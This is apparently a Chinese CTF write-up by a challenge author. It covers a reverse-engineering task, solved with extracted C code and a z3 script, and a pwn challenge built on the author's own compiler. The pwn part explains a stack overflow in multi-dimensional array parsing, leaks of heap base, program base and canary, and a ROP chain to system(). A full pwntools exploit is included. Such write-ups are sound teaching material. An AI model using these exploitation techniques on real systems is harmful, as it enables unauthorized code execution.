  • e3.key(var24(@exp.key[0])<+8><+1256><+tempa>) 的前缀和差分加密会导致 e3.key 全为 “0”,进而对 e2.key(var23(@exp.key[0])<+8><+872><+tempa>) 的异或加密失效
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
LABEL label271 :
#!tempa := {#8}*{var15<+56>}
var16<+64> := var25(@exp.L[0])<+200><+1640><+tempa>
#!tempa := {#8}*{var15<+56>}
var18<+80> := var25(@exp.R[0])<+264><+1640><+tempa>
#!tempa := {#8}*{var15<+56>}
var20<+96> := var25(@exp.X[0])<+328><+1640><+tempa>
#!tempa := {#8}*{var16<+64>}
var17<+72> := var25(@exp.key[0])<+8><+1640><+tempa>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var25(@exp.key[0])<+8><+1640><+tempa>
var17<+72> := var17<+72> - var20<+96>
var19<+88> := var19<+88> + var20<+96>
#!tempa := {#8}*{var16<+64>}
var25(@exp.key[0])<+8><+1640><+tempa> := var17<+72>
#!tempa := {#8}*{var18<+80>}
var25(@exp.key[0])<+8><+1640><+tempa> := var19<+88>
temp369 := #1
var15<+56> := var15<+56> + temp369
GOTO label272
LABEL label270 :
temp373 := #1
var15<+56> := temp373
LABEL label283 :
temp375 := #24
IF var15<+56> < temp375 GOTO label282
GOTO label281
LABEL label282 :
#!tempa := {#8}*{var15<+56>}
var17<+72> := var25(@exp.key[0])<+8><+1640><+tempa>
temp376 := #1
temp377 := var15<+56> - temp376
var16<+64> := temp377
#!tempa := {#8}*{var16<+64>}
var20<+96> := var25(@exp.key[0])<+8><+1640><+tempa>
var17<+72> := var17<+72> + var20<+96>
#!tempa := {#8}*{var15<+56>}
var25(@exp.key[0])<+8><+1640><+tempa> := var17<+72>
temp374 := #1
var15<+56> := var15<+56> + temp374
GOTO label283
  • e4.key(var25(@exp.key[0])<+8><+1640><+tempa>) 的前缀和差分加密最后会得到一个 fake flag

程序有效部分的核心逻辑如下:

  • 程序读取 flag 存入 e1.key 进行第一次前缀和差分,区间修改的操作数在 e1.L,e1.R,e1.X 中(已知)
  • 将第一轮计算的结果间隔取8个存入 e2.X,当做第二次前缀和差分的操作数
  • 第二次使用 e1.L,e1.R,e2.Xe2.key(已知)进行前缀和差分
  • 最后对比 e1.keye2.key 完全相同则 success

前缀和差分相当于对 [L,R) 的所有数字 +X:

  • 由于第一次前缀和的操作数已知,得到结果 e1.key[i]INPUT[i] + C[i]
  • 由于第二次前缀和差分需要用到第一次前缀和差分的结果,此时的 X[i] 已经变成 INPUT[i*3] + C[i*3],结果 e2.key[i] 表达为 INPUT[j1] + INPUT[j2] ...... INPUT[jn] + C[j]
  • 由于 e2.key 的初始值已知,常数 C[j] 可通过 e1.L,e1.R,e1.X 算出,加密后的 e1.key[i] 可以由含有 INPUT[j] 的式子来表示,加密后的 e2.key[i] 也可以用含有 INPUT[j] 的式子来表示,两者结合可以得到 24 组一次方程

通过中间代码提取出来的C代码样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
for(i=0;i<24;i++){
key1 = 0;
x = i;
key1 = flag[x];
y = 23 - i;
e1.key[y] = key1;
}

for(i=23;i>0;i--){
y = i;
ky = e1.key[y];
x = i - 1;
kx = e1.key[x];
kz = ky - kx;
e1.key[i] = kz;
}

e1.L[0] = 0;
e1.R[0] = 8;
e1.X[0] = 11;
e1.L[1] = 15;
e1.R[1] = 23;
e1.X[1] = 0-13;
e1.L[2] = 2;
e1.R[2] = 11;
e1.X[2] = 17;
e1.L[3] = 10;
e1.R[3] = 20;
e1.X[3] = 0-19;
e1.L[4] = 6;
e1.R[4] = 13;
e1.X[4] = 23;
e1.L[5] = 9;
e1.R[5] = 21;
e1.X[5] = 0-29;
e1.L[6] = 1;
e1.R[6] = 19;
e1.X[6] = 31;
e1.L[7] = 4;
e1.R[7] = 17;
e1.X[7] = 0-37;

for(i=0;i<8;i++){
x = e1.L[i];
y = e1.R[i];
z = e1.X[i];
kx = e1.key[x];
ky = e1.key[y];
kx += z;
ky -= z;
e1.key[x] = kx;
e1.key[y] = ky;
}

for(i=1;i<24;i++){
kx = e1.key[i];
x = i-1;
z = e1.key[x];
kx += z;
e1.key[i] = kx;
}

e2.key[0]=252;
e2.key[1]=352;
e2.key[2]=484;
e2.key[3]=470;
e2.key[4]=496;
e2.key[5]=487;
e2.key[6]=539;
e2.key[7]=585;
e2.key[8]=447;
e2.key[9]=474;
e2.key[10]=577;
e2.key[11]=454;
e2.key[12]=466;
e2.key[13]=345;
e2.key[14]=344;
e2.key[15]=486;
e2.key[16]=501;
e2.key[17]=423;
e2.key[18]=490;
e2.key[19]=375;
e2.key[20]=257;
e2.key[21]=203;
e2.key[22]=265;
e2.key[23]=125;

for(i=0;i<8;i++){
x = i + i + i;
kx = e1.key[x];
e2.X[i] = kx;
}

for(i=23;i>0;i--){
y = i;
ky = e2.key[y];
x = i;
x -= 1;
kx = e2.key[x];
kz = ky - kx;
e2.key[i] = kz;
}

for(i=0;i<8;i++){
x = e1.L[i];
y = e1.R[i];
z = e2.X[i];
kx = e2.key[x];
ky = e2.key[y];
kx -= z;
ky += z;
e2.key[x] = kx;
e2.key[y] = ky;
}

for(i=1;i<24;i++){
kx = e2.key[i];
x = i-1;
z = e2.key[x];
kx += z;
e2.key[i] = kx;
}

下面是公式推导的过程:

通过 z3 即可求解 flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# -*- coding:utf-8 -*-
from z3 import *

s = []
for i in range(24):
s.append(Int('S'+str(i)))
x = Solver()

# 0
x.add(s[0]+s[0]+22 == 252)
# 1
x.add(s[0]+s[18]+s[1]+23 == 352)
# 2
x.add(s[0]+s[18]+s[6]+s[2]+85 == 484)
# 3
x.add(s[0]+s[18]+s[6]+s[3]+85 == 470)
# 4
x.add(s[0]+s[18]+s[6]+s[21]+s[4]+35 == 496)
# 5
x.add(s[0]+s[18]+s[6]+s[21]+s[5]+35 == 487)
# 6
x.add(s[0]+s[18]+s[6]+s[21]+s[12]+s[6]+27 == 539)
# 7
x.add(s[0]+s[18]+s[6]+s[21]+s[12]+s[7]+27 == 585)
# 8
x.add(s[18]+s[6]+s[21]+s[12]+s[8]+5 == 447)
# 9
x.add(s[18]+s[6]+s[21]+s[12]+s[15]+s[9]-91 == 474)
# 10
x.add(s[18]+s[6]+s[21]+s[12]+s[15]+s[9]+s[10]-105 == 577)
# 11
x.add(s[18]+s[21]+s[12]+s[15]+s[9]+s[11]-167 == 454)
# 12
x.add(s[18]+s[21]+s[12]+s[15]+s[9]+s[12]-167 == 466)
# 13
x.add(s[18]+s[21]+s[15]+s[9]+s[13]-159 == 345)
# 14
x.add(s[18]+s[21]+s[15]+s[9]+s[14]-159 == 344)
# 15
x.add(s[18]+s[21]+s[15]+s[9]+s[3]+s[15]-113 == 486)
# 16
x.add(s[18]+s[21]+s[15]+s[9]+s[3]+s[16]-113 == 501)
# 17
x.add(s[18]+s[15]+s[9]+s[3]+s[17]-63 == 423)
# 18
x.add(s[18]+s[15]+s[9]+s[3]+s[18]-63 == 490)
# 19
x.add(s[15]+s[9]+s[3]+s[19]-64 == 375)
# 20
x.add(s[15]+s[3]+s[20]-50 == 257)
# 21
x.add(s[3]+s[21]+46 == 203)
# 22
x.add(s[3]+s[22]+46 == 265)
# 23
x.add(s[23] == 125)

if(x.check()==sat):
model = x.model()
print(model)

model = x.model()

flag = [0]*24

for i in str(model).split(','):
pos, val = i.split('=')[:2]
pos = int(''.join([i for i in pos if i.isdigit()]))
val = int(''.join([i for i in val if i.isdigit()]))
flag[pos] = chr(val)

flag = ''.join(flag)

print(flag)

Compiler 出题思路

本题目是一个我自己写的编译器,将其包装成菜单,并提供了以下4个功能:

1
2
3
4
5
1.get IR
2.get asm
3.get bin
4.input code
5.exit
  • 获取中间代码
  • 获取汇编代码
  • 获取二进制文件
  • 输入源代码

由于 “获取汇编代码” 这个功能会被逆向题目 SycLang 利用,于是本题目不提供 trans_asm 文件

1
2
3
4
5
6
7
8
9
10
case 2u:
sub_CB6A("translation Three-address-codes to Assemble-code");
system("./trans_asm");
sub_CB6A("done: get demo.s");
break;
case 3u:
sub_CB6A("translation Assemble-code to Binary-code");
system("gcc demo.s -o demo");
sub_CB6A("done: get demo");
break;
  • PS:这里偷个懒,后端直接就是 gcc,同时这里也提供了 system 函数

漏洞分析

本题目有两处溢出:

本题目在词法分析的过程中,对符号的长度和数目没有限制,但符号表却非常长,在这里进行入侵不太现实

1
2
3
4
5
6
7
8
9
.bss:0000000000020001 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+qword_20001 dq 30DBh dup(?)                         ; 0
.bss:0000000000020001 ?? ?? ?? ?? ?? ?? ?? ?? ?? ??+ ; DATA XREF: .rodata:off_13000↑o
.bss:00000000000386D9 ?? db ? ;
.bss:00000000000386DA ?? db ? ;
.bss:00000000000386DB ?? db ? ;
.bss:00000000000386DC ?? db ? ;
.bss:00000000000386DD ?? db ? ;
.bss:00000000000386DE ?? db ? ;
.bss:00000000000386DF ?? db ? ;

另外一处就是位于多级数组处理的栈溢出:

1
2
3
4
5
sub_427C(*(_QWORD *)(*(_QWORD *)(v15 + 104) + 96LL));
if ( **(_DWORD **)(*(_QWORD *)(v15 + 104) + 96LL) == 258 )
{
v18[v10++] = *(_DWORD *)(*(_QWORD *)(*(_QWORD *)(v15 + 104) + 96LL) + 40LL);
}
  • 这里原本的逻辑就是记录多级数组每一级的容量,如果多级数组的级数过多就会发生栈溢出
1
2
char v18[6]; // [rsp+4Ah] [rbp-16h]
void *v19; // [rsp+50h] [rbp-10h]
  • 这里的 v19 是一个结构体指针,其目的是为了记录以变量为索引的数组(例如:arr[i] 中的 i 就会被进行记录)

下面是这个结构体的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
union Value {
char type_id[32];
int type_int;
float type_float;
char type_char;
char type_string[32];
};

struct Array
{
int kind;
int index;
size_t offset;
union Value value;
char name[32];
struct Array *next;
};
  • Array->name 存储有该符号的名称,它可以在多个地方被打印

由于栈溢出,v19 可以被覆盖低位,进而将 Array->name 控制为我们需要的值

本程序有两处地方可供泄露:

当 Array->name 与符号表中的所有符号都不匹配时,就会发出报错:

1
2
3
4
5
6
v13 = sub_33AB(v14 + 48);
if ( v13 == -1 )
{
sub_3373(*(unsigned int *)(*(_QWORD *)(a1 + 96) + 200LL), v14 + 48, "未定义,语义错误");
return __readfsqword(0x28u) ^ v16;
}
  • 在报错中会输出该符合的名称 Array->name

当 Array->name 与符号表中任意一个符号匹配时,就会将其输出:

1
2
3
4
for ( i = 0; i < *(_DWORD *)(v11 + 4) - 1; ++i )
qword_19180 *= byte_19310[128 * (__int64)v7 + *(_DWORD *)(v11 + 4) - i];
sprintf(byte_190E0, "{#%d}*{%s<+%d>}+", qword_19180, (const char *)(v11 + 16), *(_QWORD *)(v11 + 8));
strcat(dest, byte_190E0);

入侵思路

先通过栈溢出覆盖 Array 指针的低位,控制 Array->name 指向一个堆地址,进而泄露 heap_base

本程序在拷贝数据时没有进行初始化,因此有部分栈上的数据被拷贝到堆中,这些数据都可以通过 Array->name 进行泄露

1
2
3
4
5
6
7
pwndbg> canary 
canary : 0x2ece71e5ac86af00
pwndbg> search -t qword 0x2ece71e5ac86af00
Searching for value: b'\x00\xaf\x86\xac\xe5q\xce.'
[heap] 0x55f0ee3be940 0x2ece71e5ac86af00
[heap] 0x55f0ee3be9f8 0x2ece71e5ac86af00
[heap] 0x55f0ee3bea30 0x2ece71e5ac86af00

获取 heap_base 后,就可以将 Array->name 指向更大范围的堆空间,进而泄露 pro_base,canary

最后利用现成的 system 布置一个 ROP 就结束了

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './trans_IR'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.77.77','2102')

def debug():
gdb.attach(p,"b *$rebase(0x72EC)\n")
pause()

def cmd(op):
sla("5.exit",str(op))

code = """
int main(){
int a;
struct test t;
int arr[255][255][255][255][255][255][255];
arr[32][255][255][255][255][255][a]=0;
}
"""

cmd(4)
sla("input code:",code)
cmd(1)

p.recvuntil("第6行:")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
heap_base = leak_addr - 0xa970
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

code = """
int main(){
int a;
struct test t;
int arr[255][255][255][255][255][255][255];
arr[48][255][255][255][255][255][a]=0;
}
"""

cmd(4)
sla("input code:",code)
cmd(1)

p.recvuntil("第6行:")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
pro_base = leak_addr - 0xa10a
success("leak_addr >> "+hex(leak_addr))
success("pro_base >> "+hex(pro_base))

bss_addr = pro_base + 0x19040 + 0x200
system = pro_base + 0xCD92
pop_rdi = pro_base + 0x00000000000125b3
success("system >> "+hex(system))
success("pop_rdi >> "+hex(pop_rdi))

stack_heap = heap_base + 0x11f20 +1-0x30
success("stack_heap >> "+hex(stack_heap))

#debug()

stack_heaps = []
for i in range(6):
stack_heaps.append((stack_heap>>(8*i)) % 256)
print(stack_heaps)

code = """
int main(){
int a;
struct test t;
int arr[255][255][255][255][255][255][255][255][255];
arr[%s][%s][%s][255][255][255][255][255][a]=0;
}
""" % (stack_heaps[2],stack_heaps[1],stack_heaps[0])

cmd(4)
sla("input code:",code)
cmd(1)

p.recvuntil("第6行:")
leak_addr = u64(p.recv(7).ljust(8,"\x00"))
canary_stack = leak_addr * 0x100

success("leak_addr >> "+hex(leak_addr))
success("canary_stack >> "+hex(canary_stack))

canary_stacks = []
for i in range(8):
canary_stacks.append((canary_stack>>(8*i)) % 256)
print(canary_stacks)

bss_addrs = []
for i in range(8):
bss_addrs.append((bss_addr>>(8*i)) % 256)
print(bss_addrs)

systems = []
for i in range(8):
systems.append((system>>(8*i)) % 256)
print(systems)

pop_rdis = []
for i in range(8):
pop_rdis.append((pop_rdi>>(8*i)) % 256)
print(pop_rdis)

code = """
int main(){
cat ./flag;
}
"""

cmd(4)
sla("input code:",code)
cmd(1)

binsh = heap_base +0x199fe
binshs = []
for i in range(8):
binshs.append((binsh>>(8*i)) % 256)
print(binshs)

#debug()

code = """
int main(){
int arr[255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255][255];
arr[%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][0][0][0][0][0][0][0][0][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][%s][255][255][255][255][255][255]=0;
}
""" % (systems[7],systems[6],systems[5],systems[4],
systems[3],systems[2],systems[1],systems[0],
binshs[7],binshs[6],binshs[5],binshs[4],
binshs[3],binshs[2],binshs[1],binshs[0],
pop_rdis[7],pop_rdis[6],pop_rdis[5],pop_rdis[4],
pop_rdis[3],pop_rdis[2],pop_rdis[1],pop_rdis[0],
canary_stacks[7],canary_stacks[6],canary_stacks[5],canary_stacks[4],
canary_stacks[3],canary_stacks[2],canary_stacks[1],canary_stacks[0],
bss_addrs[7],bss_addrs[6],bss_addrs[5],bss_addrs[4],
bss_addrs[3],bss_addrs[2],bss_addrs[1],bss_addrs[0])

cmd(4)
sla("input code:",code)
cmd(1)

p.interactive()

出这个题目之前正好在学编译原理,我当时在做编译器 Lab 的时候就遇到了溢出的相关问题,于是就干脆把我做 Lab 时写的编译器拿出来改了改,弄了个 pwn 出来